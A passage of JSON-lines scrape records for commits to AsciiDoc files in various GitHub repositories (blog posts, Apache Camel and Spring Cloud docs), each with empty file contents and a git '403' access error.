2015-09-15-HP-Because-The-Right-Color-Matters.adoc","message":"Update 2015-09-15-HP-Because-The-Right-Color-Matters.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-15-HP-Because-The-Right-Color-Matters.adoc","new_file":"_posts\/2015-09-15-HP-Because-The-Right-Color-Matters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34b2d5e117a38b59895731088bfe7d95a55bede0","subject":"Delete 3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","message":"Delete 3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"532ab24c55cbeeafc924da97c9e9690b5633cc39","subject":"layout fixes","message":"layout fixes\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"481829897ee2d37f2d8fa4ac8c403bcffe07a063","subject":"Create InstallAndroid.adoc","message":"Create InstallAndroid.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/InstallAndroid.adoc","new_file":"wiki\/InstallAndroid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83b249153dbd7d825968f880d76a035e7f42c1fb","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17fa481ee8b4d5a9159f0d86d2e3b3b4a148e4ae","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"311fdbd8207b1904825ffaf1ee11c13493f0073e","subject":"Update 2015-07-16-The-Arrival-Part-I.adoc","message":"Update 2015-07-16-The-Arrival-Part-I.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-The-Arrival-Part-I.adoc","new_file":"_posts\/2015-07-16-The-Arrival-Part-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1256c25052e59267592acb4b86debefc58496205","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a5142479d5c902dcad42a8f81aae50311ef2eba","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269bfa0fe651d6438ac45033abf9a165db0e4700","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bfa871ce6e22bdf8fa249a64e238885e1022a8a","subject":"Update 2017-09-21-My-First-Post.adoc","message":"Update 2017-09-21-My-First-Post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-21-My-First-Post.adoc","new_file":"_posts\/2017-09-21-My-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5c9d4feda7b79a42830a4c2c0fca7e7bed7e1c9","subject":"y2b create post iPhone 6S Battery Case - Design Failure?","message":"y2b create post iPhone 6S Battery Case - Design Failure?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-08-iPhone-6S-Battery-Case--Design-Failure.adoc","new_file":"_posts\/2015-12-08-iPhone-6S-Battery-Case--Design-Failure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5ad6a440a3fc55eed9b6971d454120dbf1a278d","subject":"docs - Convert index.adoc content format to asciidoc","message":"docs - Convert index.adoc content format to asciidoc\n","repos":"davidkarlsen\/camel,Fabryprog\/camel,Fabryprog\/camel,nicolaferraro\/camel,cunningt\/camel,punkhorn\/camel-upstream,gnodet\/camel,cunningt\/camel,DariusX\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel,mcollovati\/camel,ullgren\/camel,tdiesler\/camel,christophd\/camel,CodeSmell\/camel,zregvart\/camel,adessaigne\/camel,tadayosi\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,alvinkwekel\/camel,christophd\/camel,nicolaferraro\/camel,tdiesler\/camel,gnodet\/camel,objectiser\/camel,davidkarlsen\/camel,pmoerenhout\/camel,DariusX\/camel,pax95\/camel,CodeSmell\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,pmoerenhout\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,objectiser\/camel,DariusX\/camel,Fabryprog\/camel,apache\/camel,Fabryprog\/camel,christophd\/camel,punkhorn\/camel-upstream,tadayosi\/camel,CodeSmell\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,adessaigne\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,apache\/camel,punkhorn\/camel-upstream,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,gnodet\/camel,zregvart\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,adessaigne\/camel,zregvart\/camel,objectiser\/camel,christophd\/camel,ullgren\/camel,mcollovati\/camel,davidkarlsen\/camel,ullgren\/camel,alvinkwekel\/camel,CodeSmell\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,pax95\/camel,punkhorn\/camel-upstream","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/index.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9bc4aa5824835c7a70676db753ee8a45cd260dbd","subject":"Update 2016-04-01-dragonfly-dynamic-s3-cdn.adoc","message":"Update 2016-04-01-dragonfly-dynamic-s3-cdn.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-dragonfly-dynamic-s3-cdn.adoc","new_file":"_posts\/2016-04-01-dragonfly-dynamic-s3-cdn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ec5dd2e4bb20a802293c71be83a3be1264ab98b","subject":"Update 2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","message":"Update 2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","repos":"javiersantos\/javiersantos.github.io,javiersantos\/javiersantos.github.io","old_file":"_posts\/2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","new_file":"_posts\/2015-07-03-Managing-your-Android-apps-using-ML-Manager.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javiersantos\/javiersantos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72dd532fd2170b2210f8ff8e4113554b56f04c6f","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-zookeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef0afd844222f8ff533576a14216c8a9ed482fcc","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul,spring-cloud\/spring-cloud-consul","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-consul.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a2561460164ec83a1283ac9769798bf3ce78361","subject":"Update 2015-09-03-Setting-up-new-HubPress-site.adoc","message":"Update 2015-09-03-Setting-up-new-HubPress-site.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-03-Setting-up-new-HubPress-site.adoc","new_file":"_posts\/2015-09-03-Setting-up-new-HubPress-site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8df9a0a62960afed0e4b15a73e8f663859edf3d4","subject":"[#410] Added article: Picocli on GraalVM: Blazingly Fast Command Line Apps","message":"[#410] Added article: Picocli on GraalVM: Blazingly Fast Command Line Apps\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/picocli-on-graalvm.adoc","new_file":"docs\/picocli-on-graalvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"483fb050294314ced429347d1857a7f0330eae91","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39b7a34db55b9fc81f49b5259e2fe1a9b5120d96","subject":"Added sections 1.1, 1.2 and 1.3.","message":"Added sections 1.1, 1.2 and 1.3.\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d1709b35ba311b8f39b17c1e1c4f4101624328ee","subject":"Update 2018-09-10-sparkle.adoc","message":"Update 2018-09-10-sparkle.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-10-sparkle.adoc","new_file":"_posts\/2018-09-10-sparkle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61dd905af3cc99fd120c73a4d609814a114c2e84","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556c3b13879511f9a67c2d74d038c601ad885570","subject":"Initial debugging guide","message":"Initial debugging guide\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/debugging.adoc","new_file":"userguide\/tutorials\/debugging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}